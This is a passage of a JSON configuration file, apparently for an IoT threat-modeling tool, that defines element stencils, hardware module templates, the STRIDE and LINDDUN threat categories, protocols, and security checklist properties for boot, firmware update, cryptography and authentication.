Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","templateDFDID":"1ad7afbf-59a5-41ec-905e-621602e17ea6"},{"Name":"Bluetooth","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has Secure Version","ID":"80419a47-0ac7-488f-b958-da045b67d91f","Tooltip":"At the time of writing, it is advised to use at least Bluetooh BR/EDR version 4.1 or Bluetooth LE version 4.2","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Secure Mode","ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","Tooltip":"Secure modes are numeric comparison, passkey entry and out of band. Just works is not secure.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Highest Security Level","ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","Tooltip":"There are four security levels. The highest level, Security Level 4, should be used.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"2460a6c9-40e5-44c7-b133-10c6654efd18","templateDFDID":"f6abd33c-f527-4621-9a09-1ee5466aee01"},{"Name":"Internet Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"b76ebd30-234d-4704-bf27-ab3e0bf5ae97"},{"Name":"Company Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[{"DisplayName":"Has Network Monitoring","ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2"},{"Name":"Local Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"9f80b636-e7a4-4782-b529-24235055ebe3"},{"ID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","Name":"Device Casing","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Mobile","ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":72},{"Name":"PCB","Description":"","ElementTypeID":72,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Replaceable","ID":"IsReplaceable","Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f"},{"ID":"361cf331-bd80-413d-835a-ac900f091906","Name":"Chip/IC","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":72},{"ID":"74245351-b923-4cd6-b9e7-fe9f9916cbf5","Name":"SQL Database","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":21},{"ID":"0e15730c-980a-4a58-a2e2-b10b9de30d6d","Name":"Button","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","Name":"Display","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Enables Authentication","ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","Tooltip":"Users can log in to the system, usually by entering username and password.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","Name":"Battery Power Supply","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","Name":"Wired Power Supply","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Pluggable ","ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51},{"ID":"5f755466-4417-4060-83de-64bddeabd1ba","Name":"Car Battery","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty3","Value":true}]},{"ID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","Name":"Microphone","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"210ba217-67da-4bda-9063-3c95716eb5b9","Name":"Loudspeaker","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","Name":"Camera","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Can Record Humans","ID":"38883a00-d18f-4d1f-8a4c-18741a480557","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Has Gesture Recognition","ID":"d9919a71-0642-46a5-8056-348e06f8b86e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":51},{"ID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","Name":"Motor","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","Name":"Key File","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Encrypted","ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":21},{"ID":"59076fab-74e3-415a-93f5-fffd12e3d79c","Name":"Web Server","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"ed2c7ab5-2fbf-44fc-83b1-d06b38e861f3","Name":"User","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":32},{"ID":"2ca5ca37-5df9-4b94-ad56-b383c1f7be40","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["f805dd78-eac2-4967-8dfc-231605a75ace"]}]},{"ID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","Name":"Authentication","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":31},{"ID":"de170dec-af60-4cc7-8daf-946b3fa53132","Name":"RFID","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Has EPC","ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","Tooltip":"Has Electronic Product Code (EPC)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":61,"templateDFDID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0"},{"ID":"840b5bd1-b250-427c-bf56-5ddf826382ff","Name":"GPS","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61,"templateDFDID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860"},{"ID":"7edf2806-e7a8-4a26-b1cf-2a3de3d41b53","Name":"Modbus","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"Profibus","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"b7057a19-76b2-4cf5-9d7a-e3335079fa5f","templateDFDID":"0d96e10f-fddd-4855-9efa-e2480847866a"},{"ID":"60eaa240-6b5f-4c62-b33f-77c772c9375a","Name":"Profinet","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61}],"stencilTypeTemplates":[{"ID":"943f0836-0524-46a0-b495-9e5dc5c8f39e","Name":"Microcontroller","Description":"","stencilTypeIDs":["8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","69401648-0084-45ca-b984-505173c9cdb1","4409e854-5f53-4e7e-bee5-232c0e27fb40","cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","361cf331-bd80-413d-835a-ac900f091906"],"ListInHWDiagram":true,"ListInElementTypeIDs":[12,72],"Layout":[{"x":20,"y":40,"canEditSize":false,"width":340,"height":250,"name":"Microprocessor"},{"x":180,"y":40,"canEditSize":false,"width":0,"height":0,"name":"SRAM"},{"x":20,"y":135,"canEditSize":false,"width":0,"height":0,"name":"FLASH"},{"x":180,"y":135,"canEditSize":false,"width":0,"height":0,"name":"JTAG"},{"x":0,"y":0,"canEditSize":true,"width":340,"height":250,"name":"Chip"}],"CanEditInWhichDiagram":true},{"ID":"ffd00d05-c506-4bf9-af35-0b0f56234515","Name":"CAN Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"CAN Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"CAN Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"CAN Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"054dd0d3-961a-4f18-9aee-92ac1b515392","Name":"USB Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"USB Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"USB Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"USB Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4","Name":"SPI Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"SPI Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"SPI Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"SPI Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"5135733f-bcb2-459e-a84b-048c832f5616","Name":"RF Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RF Module Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RF Module Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RF Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"1ad7afbf-59a5-41ec-905e-621602e17ea6","Name":"WiFi Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"WiFi Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"f6abd33c-f527-4621-9a09-1ee5466aee01","Name":"Bluetooth Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Bluetooth Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d96e10f-fddd-4855-9efa-e2480847866a","Name":"PROFIBUS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"PROFIBUS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0","Name":"RFID Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RFID Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RFID Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RFID Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860","Name":"GPS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"GPS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"GPS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"GPS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47","Name":"Ethernet Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Ethernet Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true}],"stencilThreatMnemonics":[{"ID":"c262c90f-3076-43f2-8de3-0cada1f881cd","Name":"STRIDE","Description":"","Letters":[{"Name":"Spoofing","Letter":"S","Description":"Threat against the security goal authenticity","AffectedElementTypes":[11,12,31,32,51],"threatCategoryID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","ID":"89012bfb-6c3e-465b-aa8c-31e41614968f"},{"Name":"Tampering","Letter":"T","Description":"Threat against the security goal integrity","AffectedElementTypes":[11,12,21,22,72,41,51,61],"threatCategoryID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","ID":"b09d9704-9868-446d-a6a6-f91761d223ef"},{"Name":"Repudiation","Letter":"R","Description":"Threat against the security goal Non-repudiation","AffectedElementTypes":[11,12,31,32],"threatCategoryID":"a77f314c-f74e-4340-a993-5a1a24f26db4","ID":"111e4a03-1420-4cc4-8a8c-b649258851f0"},{"Name":"Information Disclosure","Letter":"I","Description":"Threat against the security goal confidentiality","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","ID":"1da5e6cb-43b9-4fbb-acaa-5437d658bf31"},{"Name":"Denial of Service","Letter":"D","Description":"Threat against the security goal availability","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"422b9042-212d-4467-a000-2528a2e09f8b","ID":"4cb90c1b-9c46-4666-99ff-151e3f7fb122"},{"Name":"Elevation of Privilege","Letter":"E","Description":"Threat against the security goal authorization","AffectedElementTypes":[11,12],"threatCategoryID":"8687e614-c127-418b-8fda-536bb2f0708f","ID":"7ab5111c-e480-41e6-9c6d-0c48433fac72"}]},{"ID":"1e834e57-12f5-4679-8027-434d1e5812a2","Name":"LINDDUN","Description":"https://www.linddun.org/linddun","Letters":[{"Name":"Linkability","Letter":"L","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"55379fba-d815-4e29-bd4b-9aa674ed6821","ID":"dc68752a-08bc-4359-858d-b84ad3ede975"},{"Name":"Identifiability","Letter":"I","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest.  \u200b","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"5278c995-f9d9-410e-b012-2995ba30c353","ID":"2062fc21-5b59-44a5-9ba2-88bdf22710a7"},{"Name":"Non-Repudiation","Letter":"N","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","ID":"c1d68de4-a522-4cf8-8f95-501b2f422498"},{"Name":"Detectability","Letter":"D","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","ID":"b96ae216-002a-48fd-97b2-5807ea74f696"},{"Name":"Disclosure of Information","Letter":"D","Description":"An adversary is able to learn the content of an item of interest about a data subject.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","ID":"22de5b16-e0db-43b6-9a80-2618e3848f88"},{"Name":"Unawareness","Letter":"U","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","AffectedElementTypes":[31,32],"threatCategoryID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","ID":"10cdb2c2-e4ec-4d88-86a8-934339f84ed8"},{"Name":"Non-Compliance","Letter":"N","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"2521b219-3d43-4fd8-bf96-d658eea44d01","ID":"24a57fc5-2005-4867-8c56-b1a96ea38be9"}]},{"ID":"40ae1e0b-e25a-4285-a580-3f2d68d6cb75","Name":"Safety & Privacy","Description":"","Letters":[{"Name":"Safety","Letter":"S","Description":"Threats threatening the safety of operation, humans, and machines","AffectedElementTypes":[51,41,32],"threatCategoryID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","ID":"df1e858e-538b-4f26-b6e1-ea7813e63d3d"},{"Name":"Privacy","Letter":"P","Description":"Threats threatening the privacy","AffectedElementTypes":[51,11,21,22,12,41],"threatCategoryID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","ID":"5ae41943-50b7-46c3-acbb-97c70e085c39"}]}],"protocols":[{"ID":"5c833fba-2a5b-4d15-bc48-f4a6e74ddc27","Name":"Protocol","Description":"","IsDefault":true,"Properties":[{"DisplayName":"Provides Confidentiality","ID":"ProvidesConfidentiality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Integrity","ID":"ProvidesIntegrity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Sender Authenticity","ID":"ProvidesSenderAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Receiver Authenticity","ID":"ProvidesReceiverAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"ID":"857c7b5e-e034-41f8-9b60-ee11aa9771f1","Name":"HTTP","Description":"","IsDefault":false,"Properties":[]},{"ID":"21731335-5e66-455c-9b6a-6796ac85577a","Name":"HTTPS","Description":"","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"New Property2","Value":true},{"Key":"New Property1","Value":true},{"Key":"ProvidesConfidentiality","Value":true},{"Key":"ProvidesIntegrity","Value":true},{"Key":"ProvidesReceiverAuthenticity","Value":true}]},{"ID":"f805dd78-eac2-4967-8dfc-231605a75ace","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[]},{"ID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","Name":"Proprietary Protocol","Description":"","IsDefault":false,"Properties":[]}],"myComponentSWTypes":[{"ID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Name":"Operating System","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Has Only Required Components","ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","Tooltip":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Latest OS Version","ID":"4ba05121-485a-40eb-832a-f4095c7b88df","Tooltip":"Is the OS the latest available stable version?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Secure Config Is Default","ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","Tooltip":"Does the device ship with the most secure configuration in place (security by default)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Component Update Process","ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","Tooltip":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Activated Ports","ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","Tooltip":"Are all ports, protocols, and services that are not used deactivated?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Root Access Restricted","ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","Tooltip":"Is the access to the root file system restricted for users/applications?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Follows Least Privilege Principal","ID":"7378780b-e280-4494-84f2-0beb4e7257ec","Tooltip":"Have all files and directories the minimum required access rights (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"File System Is Encrypted ","ID":"85e19877-51a0-4904-8e98-b2fb14be3922","Tooltip":"Is the file system encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Name":"Trusted Computing Base","Description":"See section C and M of https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf\\nand section 6.1 of https://www.gsma.com/iot/wp-content/uploads/2020/05/CLP.13-v2.2-GSMA-IoT-Security-Guidelines-for-Endpoint-Ecosystems.pdf","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Secure Boot","ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","Tooltip":"Does the device implement a secure boot?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Root Of Trust","ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","Tooltip":"Does the device has a immutable Root Of Trust in hardware?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Proper Boot Order","ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","Tooltip":"Does the device boot the next stage only after the successful boot of the previous stage? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Checks Immediately Before Execution","ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","Tooltip":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Boot Code Protection in RAM","ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Trusted Execution Environment","ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","Tooltip":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Isolates Cryptographic Operations","ID":"28c99516-8651-452e-86f7-ce00df632c8d","Tooltip":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Name":"Firmware Update","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Is Updatable","ID":"367b80cd-1b41-483b-a157-b143714b8af7","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Prevents Roll-Back","ID":"d951b792-f84b-4ab3-82d1-21867e202755","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Integrity","ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","Tooltip":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Authenticity","ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","Tooltip":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows TOCTOU attack","ID":"000441ff-d15f-46c3-bb9c-0c949063271d","Tooltip":"Does the system ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fail Safe Mechanism","ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","Tooltip":"Does the system implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Encrypted","ID":"434d79b2-574c-4575-813b-19ec7854a139","Tooltip":"Is the firmware update encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"838f741c-120e-4b73-951a-d55a11d36ca4","Name":"Cryptography","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Risky Cryptographic Algorithm ","ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows Downgrade","ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Weak Block Cipher Mode","ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Appropriate Parameters","ID":"08377961-8f56-4b56-b684-331f77810f1d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Sufficient Entropy","ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Reuses Nonces","ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements PFS","ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","Tooltip":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Name":"Authentication","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hard-Coded Credentials","ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Default Credentials","ID":"714ed1de-855c-491b-8a08-745a99e17413","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Password Requirements","ID":"540e39da-3227-4e6c-86ea-32a017318511","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Multi-Factor Authentication","ID":"88763e20-7878-4525-81d8-c4d09b867042","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Restriction of Attempts","ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session ID Expiration","ID":"51473250-3891-4342-a8b8-687db16ffef3","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session Timeout","ID":"a21a6894-256f-4bfd-bd49-09352d054399","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Strong Password Recovery","ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Client-side 